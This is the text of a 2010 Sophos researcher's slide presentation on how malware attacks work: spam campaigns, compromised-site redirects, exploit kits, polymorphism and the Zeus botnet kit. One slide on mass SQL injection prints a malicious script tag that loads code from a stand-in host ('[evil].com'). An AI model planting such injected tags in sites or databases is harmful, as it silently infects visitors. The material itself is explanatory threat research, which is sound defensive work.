870 likes | 1.05k Views
Anatomy of attack – the way of malware. Vanja Svajcer Principal Researcher – Sophos Zagreb, 12 svibnja 2010. What do SophosLabs do?. Collect threats Analyze and classify Create detection and cleanup Publish updates and information R & D More details later. SophosLabs at the core.
E N D
Anatomy of attack – the way of malware Vanja Svajcer Principal Researcher – Sophos Zagreb, 12svibnja2010
What do SophosLabs do? • Collect threats • Analyze and classify • Create detection and cleanup • Publish updates and information • R & D • More details later
Anatomy of attack • Setting the scene • Malware • Attack techniques • Analysis process & tools • Protection technology
Malware types • Virus • Trojan • Worm
Who used to write viruses? No “standard” virus writer, no “standard” motivation. Schoolkids Undergraduates Post-graduates IT Professionals Generally blokes but not A/V companies
Who writes malware today? Rarely see viruses but they are making a comeback It is about money It is criminal in its origins ( There are still some spotty teenagers out there …)
APT • Advanced Persistent Threat • Fashionable term for “targeted malware” • Small size (around 100k) and specialised • No packing • Looks like legitimate Windows file • Data exfiltration • Difficult to remove
Email threats • The latter half of 2008 saw adramatic rise in emailattachment malware • 2009 has seen this trendcontinue, several families being aggressivelymass-spammed • Same old social engineering tactics • UPS/FedEx failed deliveryreports, Microsoft patches,Airline e-tickets etc etc
Top spammed malware (2009) • Dominated by key malware families • Bredo • Waled • Simple butstill working!
Social Engineering – Bredo Mal/Bredo • Same campaign may involve numerous “different” attachments
Social Engineering – Zbot (aka Zeus) Mal/Zbot
BredovsZbot • Competition between the bots!!! • Bredo attempting to disable any installed Zbot • Reminiscent of the NetskyvsBagle wars from years ago!!!
Email threats • Global spam traps to track spam • USA relays more spam than any other single country • Compromised computers not only spread spam, but distribute malware and launch DDoS attacks
Web predominant • 99% percent of infected systems legitimate, compromised sites • Attack sites • Botnet C&C using HTTP • Attacks still often begin with a spammed out email
Step 1: Redirect from compromised sites Compromised web sites Attacker-controlledredirects Attack site usingbundle of exploits Payload
SQL injection DB DB DB Malicious SQLinjection • Hacker uses tool to identify pages potentially vulnerable to SQL injection • Sends malicious HTTP request (Demo)
SQL injection <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http://[evil].com/file.js • SQL injection causes databases to become peppered with malicious script tags • Result is that pages on the web server built from data retrieved from the database also contain malicious script tags
SQL injection • User browses site • Malicious script tag silently loads script from remote server • Victim is infected with malware:Asprox trojan
Step 2: Further redirects Compromised web sites Attacker-controlledredirects Payload
SEO poisoning • Search for popular keywords
Step 3: Load content from the attack site Compromised web sites Attacker-controlledredirects Attack site usingbundle of exploits Payload
Web Attacks Built using purchased kit MPack, IcePack, GPack,Neosploit, Eleonore, Yes Management console Phishing Discovered: Oct 19th2009 • Country Hit rate: • France – 4% • US – 17% • GB – 3% • Germany – 6%
Web Attacks Per-browser breakdown! Server-sidepolymorphism • Hit rate: • MSIE – 12% • FireFox – 1% • Opera – 5%
Polymorphic malware weakness • Poly engine part of the code • Can be reversed by persistent researchers • Must be decrypted in memory • Emulate the code until the invariant is found • Detection can be based on the decryption loop
Step 4: Hit the victim with exploits, infect them. Compromised web sites Attacker-controlledredirects Attack site usingbundle of exploits Payload
Zeus (Zbot) • Information stealing malware and botnet building kit • Builder • Loader • Control panel